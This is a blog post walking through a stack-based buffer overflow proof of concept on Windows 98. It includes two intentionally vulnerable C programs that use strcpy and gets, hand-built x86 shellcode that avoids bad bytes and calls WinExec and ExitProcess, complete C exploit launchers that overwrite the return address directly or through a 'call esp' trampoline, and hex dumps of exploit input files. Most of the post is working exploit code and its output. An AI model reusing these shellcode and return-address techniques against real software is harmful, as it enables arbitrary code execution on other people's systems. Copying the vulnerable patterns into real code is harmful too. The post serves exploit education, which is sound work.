Stack-based buffer overflow proof of concept

In this post, I will provide proof of concept buffer overflow exploits. I will create my own programs that have specific mistakes and vulnerabilities in them, in order to exploit these mistakes using stack-based buffer overflow techniques. Of course, since I have and use the source code and I introduce the vulnerabilities myself, the programs are exceptionally easy to exploit. In a real-world scenario, things are way more difficult. This post is only meant as a way to provide proof of concept for buffer overflows, so it makes things exceptionally easy for the attacker’s side.

I will use:

Specifically, I will use VC++ (Visual C++) as my compiler and debugger. In my opinion, VC++ is excellent. It is the best development environment there is.

I will also use PEBrowse as my PE (Portable Executable) file viewer. PEBrowse is a remarkable program. As we will see, I will not require a lot of information from it. Actually, in this case, it is not really necessary, and I could have used VC++ and Free Hex Editor instead.

And, although VC++ has an excellent hex editor, HHD Software Free Hex Editor is easy, handy and useful and I will use it as my hex editor. Also, it made it easier for me to obtain the hex dumps at the end of this post, than if I had used VC++’s hex editor.

If you need any assembly language reference relative to this post, I recommend the following two sources:

1) The information provided in “IA-32 Intel Architecture Software Developer’s Manual”, which consists of four volumes and can be found at http://www.intel.com/.

2) The help files that come with Microsoft Macro Assembler (MASM) which can be found at http://www.masm32.com/. You can read the help files, which provide excellent reference. In this post I will be using VC++ as my assembler, not MASM.

KERNEL32.DLL will be loaded at the victim programs’ address space. In my exploit code, I will use the functions WinExec() and ExitProcess(). I will also need to find a “call esp” or “jmp esp” instruction for one type of exploit  (the one that has the exploit code after the return address). I open KERNEL32.DLL with PEBrowse and I find that for Windows 98, KERNEL32.DLL has:
WinExec() at address 0xBFFA0960,
ExitProcess() at address 0xBFF8D4CA,
call esp (FF D4) at address 0xBFF79243.
I also find that there is no “jmp esp” instruction in KERNEL32.DLL, but it does not matter, because “call esp” will do equally well.

I must be careful of the 0x09 byte in WinExec() address, because it will create problems if I put it as it is in my exploit code. Specifically, it will cut the exploit string in two, if the exploit string is used as a command line argument. This is because 0x09 is the character for the Horizontal Tab. Thus, my assembly code will have to take care of that 0x09 byte.

Let us see what I did to find the addresses of the two functions: I opened KERNEL32.DLL in PEBrowse, I went to “Exports” and below that I find the functions and their addresses.

To find the address “call esp” is at, I did the following:

First I created a small program in assembly:

void main(void)
{
   __asm
   {
      call esp
      jmp esp
   }
}

Then, I debuged the program to get the corresponding opcodes. This is done by right-clicking in the code window and selecting “Go To Disassembly” and again right-clicking and selecting “Code Bytes”. I found that “call esp” is “FF D4” and that “jmp esp” is “FF E4”. I then opened KERNEL32.DLL in PEBrowse, I went to “File Image” and I searched for either FF D4 or FF E4.

Actually, I could have found these addresses without the help of PEBrowse. Here is how:

As far as the WinExec() and ExitProcess() addresses are concerned, I can find them if I compile and run the following program:

#include <windows.h>
#include <stdio.h>

void main(void)
{
   HINSTANCE a;  
   FARPROC   b1;
   FARPROC   b2;

   a = LoadLibrary("KERNEL32.DLL");

   b1 = GetProcAddress(a, "WinExec");
   printf("WinExec() address is %p\n", b1);

   b2 = GetProcAddress(a, "ExitProcess");
   printf("ExitProcess() address is %p\n", b2);
}

And as far as the address of “FF D4” is concerned, I can find it if I open KERNEL32.DLL in Free Hex Editor and search for “FF D4”.

Now I will create two vulnerable programs. Each will have a buffer of 200 bytes that can be overwritten. In both programs, the buffer will be immediately before the EBP and Return Address. Also, in both programs, the buffer will be at the same address. This way, the same exploit code will work for both programs.

One program will accept data as a command line argument and the other will accept data from user input.

Both programs will be console applications, in order to illustrate nothing more than the concepts.

The program that will accept data as a command line argument is ConsoleVictim1.exe.

Code for ConsoleVictim1.exe

#include <stdio.h>
#include <string.h>

void main(int argc, char *argv[])
{
   printf("Program start\n");
   char buffer[200];
   if (argc == 2)
   {
      strcpy(buffer, argv[1]);
   }
   printf("Program end\n");
}

I debug the program and I find that the address of buffer is 0x0064FD30.

Here, the use of strcpy() is the vulnerability. If the command line argument is more that 200 characters, the buffer will overflow.

The program that will accept data as user input is ConsoleVictim2.exe.

Code for ConsoleVictim2.exe

#include <stdio.h>
#include <string.h>

void main(void)
{
   printf("Program start\n");
   char buffer[200];
   gets(buffer);
   printf("Program end\n");
}

I debug the program and I find that the address of buffer is 0x0064FD30.

Here, the use of gets() is the vulnerability. If the input the user supplies is more that 200 characters, the buffer will overflow.
 
Now I will create the exploit code. The exploit code will open a command prompt. This is done with “START COMMAND”. If I were using C, I would write the following two commands:
WinExec(“START COMMAND”, SW_SHOWNORMAL);
ExitProcess(0);
But I will write them in assembly, in order to get the corresponding opcodes.

I must be careful of the space character in “START COMMAND”, because it will create problems if I put it as it is in the exploit code. Specifically, it will cut the exploit string in two, if the exploit string is used as a command line argument. Thus, my assembly code will have to take care of that space character.

I will have to make sure no null bytes, spaces or 0x09 bytes exist in our exploit code. Null bytes terminate strings, null bytes, spaces and 0x09 bytes terminate command line arguments. I do not want the exploit string to be cut short before its end. For the same reason, I also have to avoid control characters such as line feeds, carriage returns etc.

Code for ConsoleAssembly.exe

void main(void)
{
   __asm
   {
      ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
      ;WinExec("START COMMAND", SW_SHOWNORMAL)
      ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

      ;I store "START COMMAND" in the stack

      ;push 0xFFFFFF44 ;--\D  (\ means I eventually want a null byte there)
                       ;      (- means I do not care what goes there)
      ;and also avoid to use the null byte (0x00)
      mov eax, 0x44FFFFFF
      xor al, al
      rol eax, 8
      push eax

      push 0x4E414D4D ;NAMM

      ;push 0x4F432054 ;OC T
      ;and also avoid to use space (0x20)
      mov eax, 0x544F4321
      sub al, 1
      rol eax, 8
      push eax
 
      push 0x52415453 ;RATS

      ;I get the stack address
      ;where I stored the "START COMMAND" string
      mov eax, esp

      ;I push the second argument of Kernel32.WinExec()
      ;which is SW_SHOWNORMAL.
      ;SW_SHOWNORMAL is equal to 1
      push 1    
 
      ;I push the first argument of Kernel32.WinExec()
      ;which is the address of the "START COMMAND" string
      push eax
 
      ;I call Kernel32.WinExec()
      ;which is at address 0xBFFA0960
      ;but I must not use 09 explicitly
      ;because it is a control character
      ;and I will run into problems
      ;if I use the exploit as a command line argument
      mov eax, 0x60BFFA50
      sub al, 0x47
      rol eax, 8

      call eax
 
      ;;;;;;;;;;;;;;;
      ;ExitProcess(0)
      ;;;;;;;;;;;;;;;

      ;I push the first argument of Kernel32.ExitProcess()
      ;which is zero
      ;and I also avoid to use the null byte
      xor eax, eax
      push eax

      ;I call Kernel32.ExitProcess()
      mov eax, 0xBFF8D4CA
      call eax
   }
}

Now I can test the exploit and also obtain the corresponding opcodes. These are:

B8 FF FF FF 44       mov         eax,44FFFFFFh
32 C0                xor         al,al
C1 C0 08             rol         eax,8
50                   push        eax
68 4D 4D 41 4E       push        4E414D4Dh
B8 21 43 4F 54       mov         eax,544F4321h
2C 01                sub         al,1
C1 C0 08             rol         eax,8
50                   push        eax
68 53 54 41 52       push        52415453h
8B C4                mov         eax,esp
6A 01                push        1
50                   push        eax
B8 50 FA BF 60       mov         eax,60BFFA50h
2C 47                sub         al,47h
C1 C0 08             rol         eax,8
FF D0                call        eax
33 C0                xor         eax,eax
50                   push        eax
B8 CA D4 F8 BF       mov         eax,0BFF8D4CAh
FF D0                call        eax

I will now test the same exploit code, this time written in opcodes.

Code for ConsoleOpcodes.exe

#include <stdio.h>

char shellcode[1000];
int i = 0;

void main(void)
{
   shellcode[i++] = char(0xB8); // mov         eax,44FFFFFFh
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0x44);
   shellcode[i++] = char(0x32); // xor         al,al
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);            
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        4E414D4Dh
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x4E);
   shellcode[i++] = char(0xB8); // mov         eax,544F4321h
   shellcode[i++] = char(0x21);
   shellcode[i++] = char(0x43);
   shellcode[i++] = char(0x4F);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x2C); // sub         al,1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        52415453h
   shellcode[i++] = char(0x53);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x52);
   shellcode[i++] = char(0x8B); // mov         eax,esp
   shellcode[i++] = char(0xC4);
   shellcode[i++] = char(0x6A); // push        1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,60BFFA50h
   shellcode[i++] = char(0x50);
   shellcode[i++] = char(0xFA);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0x60);
   shellcode[i++] = char(0x2C); // sub         al,47h
   shellcode[i++] = char(0x47);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);
   shellcode[i++] = char(0x33); // xor         eax,eax
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,0BFF8D4CAh
   shellcode[i++] = char(0xCA);
   shellcode[i++] = char(0xD4);
   shellcode[i++] = char(0xF8);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);

   printf("%s\n", shellcode);

   int *pInt;
   pInt = (int *)&pInt + 2;
   *pInt = (int) shellcode;
}

After the exploit passes this test, I will deploy it.

To attack the command line argument program, I will create an executable program that runs the instruction:
WinExec(“ConsoleVictim1 exploit_string”, SW_SWOWNORMAL);

The exploit string can have the exploit code in the beginning of the overflowed buffer.

Code for ConsoleExploitBefore.exe

// I use WinExec() to send command line argument exploit

#include <windows.h>
#include <stdio.h>

void main(void)
{
   char shellcode[1000];
   int i = 0;
   int j = 0;

   shellcode[i++] = 'C';
   shellcode[i++] = 'o';
   shellcode[i++] = 'n';
   shellcode[i++] = 's';
   shellcode[i++] = 'o';
   shellcode[i++] = 'l';
   shellcode[i++] = 'e';
   shellcode[i++] = 'V';
   shellcode[i++] = 'i';
   shellcode[i++] = 'c';
   shellcode[i++] = 't';
   shellcode[i++] = 'i';
   shellcode[i++] = 'm';
   shellcode[i++] = '1';
   shellcode[i++] = ' ';

   // Exploit
   shellcode[i++] = char(0xB8); // mov         eax,44FFFFFFh
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0x44);
   shellcode[i++] = char(0x32); // xor         al,al
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);            
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        4E414D4Dh
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x4E);
   shellcode[i++] = char(0xB8); // mov         eax,544F4321h
   shellcode[i++] = char(0x21);
   shellcode[i++] = char(0x43);
   shellcode[i++] = char(0x4F);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x2C); // sub         al,1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        52415453h
   shellcode[i++] = char(0x53);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x52);
   shellcode[i++] = char(0x8B); // mov         eax,esp
   shellcode[i++] = char(0xC4);
   shellcode[i++] = char(0x6A); // push        1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,60BFFA50h
   shellcode[i++] = char(0x50);
   shellcode[i++] = char(0xFA);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0x60);
   shellcode[i++] = char(0x2C); // sub         al,47h
   shellcode[i++] = char(0x47);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);
   shellcode[i++] = char(0x33); // xor         eax,eax
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,0BFF8D4CAh
   shellcode[i++] = char(0xCA);
   shellcode[i++] = char(0xD4);
   shellcode[i++] = char(0xF8);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);

   // Continue to fill up all of victim's buffer[200]
   // but remember to add
   // the 15 characters of the victim's executable name
   // in the beginning of the shellcode string:
   // 200+15-1 = 214
   // (I subtract 1 because I count i from zero)
   while (i+j <= 214)    
   {
      shellcode[i+j] = 'a';
      j++;
   }
   i = i+j;

   // Overwrite EBP
   shellcode[i++] = '1';       
   shellcode[i++] = '2';
   shellcode[i++] = '3';
   shellcode[i++] = '4';

   // Overwrite Return Address
   // with the buffer[200]'s address
   shellcode[i++] = char(0x30);
   shellcode[i++] = char(0xFD);
   shellcode[i++] = char(0x64); 
   shellcode[i++] = char(0x00);

   printf("%s\n", shellcode);

   WinExec(shellcode, SW_SHOWNORMAL);
}

Or, the console exploit string can have the exploit code after the Return Address.

Code for ConsoleExploitAfter.exe

// I use WinExec() to send command line argument exploit

#include <windows.h>
#include <stdio.h>

void main(void)
{
   char shellcode[1000];
   int i = 0;
   int j = 0;

   shellcode[i++] = 'C';
   shellcode[i++] = 'o';
   shellcode[i++] = 'n';
   shellcode[i++] = 's';
   shellcode[i++] = 'o';
   shellcode[i++] = 'l';
   shellcode[i++] = 'e';
   shellcode[i++] = 'V';
   shellcode[i++] = 'i';
   shellcode[i++] = 'c';
   shellcode[i++] = 't';
   shellcode[i++] = 'i';
   shellcode[i++] = 'm';
   shellcode[i++] = '1';
   shellcode[i++] = ' ';

   // Fill victim's buffer[200]
   for (j=0; j<200; j++)    
   {
      shellcode[i+j] = 'a';
   }
   i = i+j;

   // Overwrite EBP
   shellcode[i++] = '1';       
   shellcode[i++] = '2';
   shellcode[i++] = '3';
   shellcode[i++] = '4';

   // Overwrite Return Address with KERNEL32's
   // "call esp" address (BFF79243)
   shellcode[i++] = char(0x43);
   shellcode[i++] = char(0x92);
   shellcode[i++] = char(0xF7); 
   shellcode[i++] = char(0xBF);

   // Exploit
   shellcode[i++] = char(0xB8); // mov         eax,44FFFFFFh
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0xFF);
   shellcode[i++] = char(0x44);
   shellcode[i++] = char(0x32); // xor         al,al
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);            
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        4E414D4Dh
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x4D);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x4E);
   shellcode[i++] = char(0xB8); // mov         eax,544F4321h
   shellcode[i++] = char(0x21);
   shellcode[i++] = char(0x43);
   shellcode[i++] = char(0x4F);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x2C); // sub         al,1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0x68); // push        52415453h
   shellcode[i++] = char(0x53);
   shellcode[i++] = char(0x54);
   shellcode[i++] = char(0x41);
   shellcode[i++] = char(0x52);
   shellcode[i++] = char(0x8B); // mov         eax,esp
   shellcode[i++] = char(0xC4);
   shellcode[i++] = char(0x6A); // push        1
   shellcode[i++] = char(0x01);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,60BFFA50h
   shellcode[i++] = char(0x50);
   shellcode[i++] = char(0xFA);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0x60);
   shellcode[i++] = char(0x2C); // sub         al,47h
   shellcode[i++] = char(0x47);
   shellcode[i++] = char(0xC1); // rol         eax,8
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x08);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);
   shellcode[i++] = char(0x33); // xor         eax,eax
   shellcode[i++] = char(0xC0);
   shellcode[i++] = char(0x50); // push        eax
   shellcode[i++] = char(0xB8); // mov         eax,0BFF8D4CAh
   shellcode[i++] = char(0xCA);
   shellcode[i++] = char(0xD4);
   shellcode[i++] = char(0xF8);
   shellcode[i++] = char(0xBF);
   shellcode[i++] = char(0xFF); // call        eax
   shellcode[i++] = char(0xD0);

   printf("%s\n", shellcode);

   WinExec(shellcode, SW_SHOWNORMAL);
}

I can also put the exploit string in “Project / Settings / Debug / Program arguments” in VC++. This is done by creating a hex file that contains the string, opening it with Notepad, copying its contents and pasting them in the “Project / Settings / Debug / Program arguments” textbox. Again, the exploit string can have the exploit code either in the beginning of the buffer or after the Return Address. These exploit files will be created below to attack the user input program.

To attack the user input program, I will create a hex file with the exploit code. Then I will use MS-DOS redirection to enter the exploit string as user input to the program. Thus, in an MS-DOS prompt I will write:
ConsoleVictim2 < exploit_file

Again, the exploit code can either be at the beginning of the buffer or after the Return Address.

1) At the beginnning of the buffer

Hex dump of ExploitBefore.txt:

00000000:b8 ff ff ff 44 32 c0 c1 c0 08 50 68 4d 4d 41 4e    ΈD2ΐΑΐ.PhMMAN
00000010:b8 21 43 4f 54 2c 01 c1 c0 08 50 68 53 54 41 52    Έ!COT,.Αΐ.PhSTAR
00000020:8b c4 6a 01 50 b8 50 fa bf 60 2c 47 c1 c0 08 ff    ‹Δj.PΈPϊΏ`,GΑΐ.
00000030:d0 33 c0 50 b8 ca d4 f8 bf ff d0 61 61 61 61 61    Π3ΐPΈΚΤψΏΠaaaaa
00000040:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000050:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000060:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000070:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000080:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000090:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000a0:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000b0:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000c0:61 61 61 61 61 61 61 61 31 32 33 34 30 fd 64 00    aaaaaaaa12340ύd.

2) After the return address

Hex dump of ExploitAfter.txt:

00000000:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000010:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000020:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000030:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000040:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000050:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000060:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000070:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000080:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
00000090:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000a0:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000b0:61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61    aaaaaaaaaaaaaaaa
000000c0:61 61 61 61 61 61 61 61 31 32 33 34 43 92 f7 bf    aaaaaaaa1234C’χΏ
000000d0:b8 ff ff ff 44 32 c0 c1 c0 08 50 68 4d 4d 41 4e    ΈD2ΐΑΐ.PhMMAN
000000e0:b8 21 43 4f 54 2c 01 c1 c0 08 50 68 53 54 41 52    Έ!COT,.Αΐ.PhSTAR
000000f0:8b c4 6a 01 50 b8 50 fa bf 60 2c 47 c1 c0 08 ff    ‹Δj.PΈPϊΏ`,GΑΐ.
00000100:d0 33 c0 50 b8 ca d4 f8 bf ff d0                   Π3ΐPΈΚΤψΏΠ    
Advertisements

About Dimitrios Kalemis

I am a systems engineer specializing in Microsoft products and technologies. I am also an author. Please visit my blog to see the blog posts I have written, the books I have written and the applications I have created. I definitely recommend my blog posts under the category "Management", all my books and all my applications. I believe that you will find them interesting and useful. I am in the process of writing more blog posts and books, so please visit my blog from time to time to see what I come up with next. I am also active on other sites; links to those you can find in the "About me" page of my blog.
This entry was posted in Security. Bookmark the permalink.